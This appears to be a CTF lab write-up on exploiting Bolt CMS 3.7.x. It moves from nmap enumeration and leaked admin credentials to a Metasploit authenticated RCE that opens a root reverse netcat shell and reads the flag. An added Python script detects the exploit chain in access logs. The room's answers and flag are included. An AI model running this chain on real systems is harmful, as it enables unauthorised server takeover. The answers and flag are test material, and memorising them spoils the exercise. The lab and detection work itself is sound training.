Bolt

Posted by r3kind1e on August 10, 2023

Tag: Security, Web, Bolt, RCE

Task 1: Deploy the machine

This room is designed for users to get familiar with the Bolt CMS and how it can be exploited using Authenticated Remote Code Execution. You should wait for at least 3-4 minutes for the machine to start properly.

Start the machine

Target IP Address : 10.10.118.161

Kali Linux : 10.18.72.222

Task 2: Hack your way into the machine!

A hero is unleashed

Once you have successfully deployed the VM, enumerate it before finding the flag on the machine.

┌──(root㉿kali)-[~]
└─# nmap 10.10.118.161                    
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-10 02:59 EDT
Nmap scan report for 10.10.118.161
Host is up (0.26s latency).
Not shown: 997 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
8000/tcp open  http-alt

Nmap done: 1 IP address (1 host up) scanned in 49.00 seconds
┌──(root㉿kali)-[~]
└─# nmap -sV -p 22,80,8000 -sC 10.10.118.161
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-10 03:01 EDT
Nmap scan report for 10.10.118.161
Host is up (0.26s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 f3:85:ec:54:f2:01:b1:94:40:de:42:e8:21:97:20:80 (RSA)
|   256 77:c7:c1:ae:31:41:21:e4:93:0e:9a:dd:0b:29:e1:ff (ECDSA)
|_  256 07:05:43:46:9d:b2:3e:f0:4d:69:67:e4:91:d3:d3:7f (ED25519)
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
8000/tcp open  http    (PHP 7.2.32-1)
|_http-title: Bolt | A hero is unleashed
|_http-generator: Bolt
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 404 Not Found
|     Date: Thu, 10 Aug 2023 07:02:01 GMT
|     Connection: close
|     X-Powered-By: PHP/7.2.32-1+ubuntu18.04.1+deb.sury.org+1
|     Cache-Control: private, must-revalidate
|     Date: Thu, 10 Aug 2023 07:02:01 GMT
|     Content-Type: text/html; charset=UTF-8
|     pragma: no-cache
|     expires: -1
|     X-Debug-Token: 4d16d0
|     <!doctype html>
|     <html lang="en">
|     <head>
|     <meta charset="utf-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1.0">
|     <title>Bolt | A hero is unleashed</title>
|     <link href="https://fonts.googleapis.com/css?family=Bitter|Roboto:400,400i,700" rel="stylesheet">
|     <link rel="stylesheet" href="/theme/base-2018/css/bulma.css?8ca0842ebb">
|     <link rel="stylesheet" href="/theme/base-2018/css/theme.css?6cb66bfe9f">
|     <meta name="generator" content="Bolt">
|     </head>
|     <body>
|     href="#main-content" class="vis
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Date: Thu, 10 Aug 2023 07:02:00 GMT
|     Connection: close
|     X-Powered-By: PHP/7.2.32-1+ubuntu18.04.1+deb.sury.org+1
|     Cache-Control: public, s-maxage=600
|     Date: Thu, 10 Aug 2023 07:02:00 GMT
|     Content-Type: text/html; charset=UTF-8
|     X-Debug-Token: 40dd42
|     <!doctype html>
|     <html lang="en-GB">
|     <head>
|     <meta charset="utf-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1.0">
|     <title>Bolt | A hero is unleashed</title>
|     <link href="https://fonts.googleapis.com/css?family=Bitter|Roboto:400,400i,700" rel="stylesheet">
|     <link rel="stylesheet" href="/theme/base-2018/css/bulma.css?8ca0842ebb">
|     <link rel="stylesheet" href="/theme/base-2018/css/theme.css?6cb66bfe9f">
|     <meta name="generator" content="Bolt">
|     <link rel="canonical" href="http://0.0.0.0:8000/">
|     </head>
|_    <body class="front">
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 38.98 seconds

http://10.10.118.161:8000/

http://10.10.118.161:8000/entry/message-for-it-department

Message for IT Department

Written by Admin on Saturday July 18, 2020

Hey guys,

i suppose this is our secret forum right? I posted my first message for our readers today but there seems to be a lot of freespace out there. Please check it out! my password is boltadmin123 just incase you need it!

Regards,

Jake (Admin)

http://10.10.118.161:8000/entry/message-from-admin

Message From Admin

Written by Admin on Saturday July 18, 2020

Hello Everyone,

Welcome to this site, myself Jake and my username is bolt .I am still new to this CMS so it can take awhile for me to get used to this CMS but believe me i have some great content coming up for you all!

Regards,

Jake (Admin)

Login credentials obtained:

username: bolt

password: boltadmin123

User Manual / Login

According to the Bolt CMS documentation, the login page is: http://10.10.118.161:8000/bolt/login

Logging in with the username and password above succeeds and lands on the Dashboard.

The web application's version is shown in the bottom-left corner of the page: Bolt Version: 3.7.1, i.e. Bolt 3.7.1.

Bolt CMS 3.7.0 - Authenticated Remote Code Execution

Description

This module exploits multiple vulnerabilities in Bolt CMS versions 3.7.0 and 3.6.* in order to execute arbitrary commands as the user running Bolt. The module first exploits a vulnerability that allows an authenticated user to change the username in /bolt/profile to a PHP system($_GET[""]) variable. Next, the module obtains a list of tokens from /async/browse/cache/.sessions and uses these tokens to create files with the blacklisted .php extension via HTTP POST requests to /async/folder/rename. For each created file, the module checks the HTTP response to see whether arbitrary commands can be executed via the created PHP $_GET variable. If the response is negative, the file is deleted; otherwise the payload is executed via an HTTP GET request of the form /files/?<$_GET_var>=. Valid credentials for a Bolt CMS user are required. This module has been tested successfully on Bolt CMS 3.7.0 running on CentOS 7.
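Because Bolt's /files/ directory should never serve PHP, each stage of the chain described above leaves a distinctive request in the web server's access log. The following detection script is an added example, not part of the original post or of the Metasploit module; the log lines are constructed, and the path patterns follow the module description (the stage labels are my own naming).

```python
import re
from collections import defaultdict

# Constructed Apache-style access log lines (sample data, not from the original post).
SAMPLE_LOG = """\
10.18.72.222 - - [10/Aug/2023:03:56:20 -0400] "POST /bolt/profile HTTP/1.1" 302 0
10.18.72.222 - - [10/Aug/2023:03:56:21 -0400] "GET /async/browse/cache/.sessions HTTP/1.1" 200 1843
10.18.72.222 - - [10/Aug/2023:03:56:22 -0400] "POST /async/folder/rename HTTP/1.1" 200 15
10.18.72.222 - - [10/Aug/2023:03:56:23 -0400] "GET /files/ffdqnvgwft.php?goxmdd=id HTTP/1.1" 200 51
192.0.2.10 - - [10/Aug/2023:04:00:00 -0400] "GET /entry/message-from-admin HTTP/1.1" 200 4021
192.0.2.10 - - [10/Aug/2023:04:00:05 -0400] "GET /files/logo.png HTTP/1.1" 200 9001
"""

LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

# One entry per stage of the chain: (label, HTTP method, path pattern). Labels are hypothetical.
STAGES = [
    ("profile_edit", "POST", re.compile(r"^/bolt/profile$")),
    ("session_listing", "GET", re.compile(r"^/async/browse/cache/\.sessions")),
    ("folder_rename", "POST", re.compile(r"^/async/folder/rename$")),
    ("php_in_files", "GET", re.compile(r"^/files/[^?]*\.php(\?|$)")),
]

def classify(method, path):
    """Map one request to a stage label, or None if it is unrelated to the chain."""
    for label, m, rx in STAGES:
        if method == m and rx.search(path):
            return label
    return None

def scan(log_text):
    """Return {client_ip: [stage labels, in order first seen]} for clients touching any stage."""
    seen = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        label = classify(m["method"], m["path"])
        if label and label not in seen[m["ip"]]:
            seen[m["ip"]].append(label)
    return dict(seen)

def suspicious(log_text, min_stages=3):
    """Clients that executed PHP under /files/ or walked at least min_stages of the chain."""
    return sorted(ip for ip, stages in scan(log_text).items()
                  if "php_in_files" in stages or len(stages) >= min_stages)

if __name__ == "__main__":
    for ip in suspicious(SAMPLE_LOG):
        print(ip, scan(SAMPLE_LOG)[ip])
```

A single hit on "php_in_files" is worth an alert on its own; the profile edit and session listing are legitimate admin actions in isolation, which is why they only count in combination.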

msf6 > search Bolt

Matching Modules
================

   #  Name                                        Disclosure Date  Rank       Check  Description
   -  ----                                        ---------------  ----       -----  -----------
   0  exploit/unix/webapp/bolt_authenticated_rce  2020-05-07       great      Yes    Bolt CMS 3.7.0 - Authenticated Remote Code Execution
   1  exploit/multi/http/bolt_file_upload         2015-08-17       excellent  Yes    CMS Bolt File Upload Vulnerability


Interact with a module by name or index. For example info 1, use 1 or use exploit/multi/http/bolt_file_upload

msf6 > use 0
[*] Using configured payload cmd/unix/reverse_netcat
msf6 exploit(unix/webapp/bolt_authenticated_rce) > 
msf6 exploit(unix/webapp/bolt_authenticated_rce) > show options

Module options (exploit/unix/webapp/bolt_authenticated_rce):

   Name                 Current Setting        Required  Description
   ----                 ---------------        --------  -----------
   FILE_TRAVERSAL_PATH  ../../../public/files  yes       Traversal path from "/files" on the web server to "/root" on the server
   PASSWORD                                    yes       Password to authenticate with
   Proxies                                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using
                                                         -metasploit.html
   RPORT                8000                   yes       The target port (TCP)
   SSL                  false                  no        Negotiate SSL/TLS for outgoing connections
   SSLCert                                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI            /                      yes       Base path to Bolt CMS
   URIPATH                                     no        The URI to use for this exploit (default is random)
   USERNAME                                    yes       Username to authenticate with
   VHOST                                       no        HTTP server virtual host


   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.
                                       0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.


Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   2   Linux (cmd)



View the full module info with the info, or info -d command.
msf6 exploit(unix/webapp/bolt_authenticated_rce) > run

[*] Started reverse TCP handler on 10.18.72.222:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Successfully changed the /bolt/profile username to PHP $_GET variable "goxmdd".
[*] Found 3 potential token(s) for creating .php files.
[+] Deleted file ubarzzmqcgc.php.
[+] Deleted file blwtcrohf.php.
[+] Used token b9177f20deed265f891752d759 to create ffdqnvgwft.php.
[*] Attempting to execute the payload via "/files/ffdqnvgwft.php?goxmdd=`payload`"
[!] No response, may have executed a blocking payload!
[*] Command shell session 1 opened (10.18.72.222:4444 -> 10.10.118.161:47724) at 2023-08-10 03:56:24 -0400
[+] Deleted file ffdqnvgwft.php.
[+] Reverted user profile back to original state.

id
uid=0(root) gid=0(root) groups=0(root)
whoami
root
find / -name flag.txt 2>/dev/null
/home/flag.txt
cat /home/flag.txt
THM{wh0_d035nt_l0ve5_b0l7_r1gh7?}

Answer the questions below

What port number has a web server with a CMS running?

8000

What is the username we can find in the CMS?

bolt

What is the password we can find for the username?

boltadmin123

What version of the CMS is installed on the server? (Ex: Name 1.1.1)

Bolt 3.7.1

There’s an exploit for a previous version of this CMS, which allows authenticated RCE. Find it on Exploit DB. What’s its EDB-ID?

48296

Metasploit recently added an exploit module for this vulnerability. What’s the full path for this exploit? (Ex: exploit/….)

Note: If you can't find the exploit module, it's most likely because your Metasploit isn't updated. Run apt update, then apt install metasploit-framework.

exploit/unix/webapp/bolt_authenticated_rce

Set the LHOST, LPORT, RHOST, USERNAME, PASSWORD in msfconsole before running the exploit

Look for flag.txt inside the machine.

THM{wh0_d035nt_l0ve5_b0l7_r1gh7?}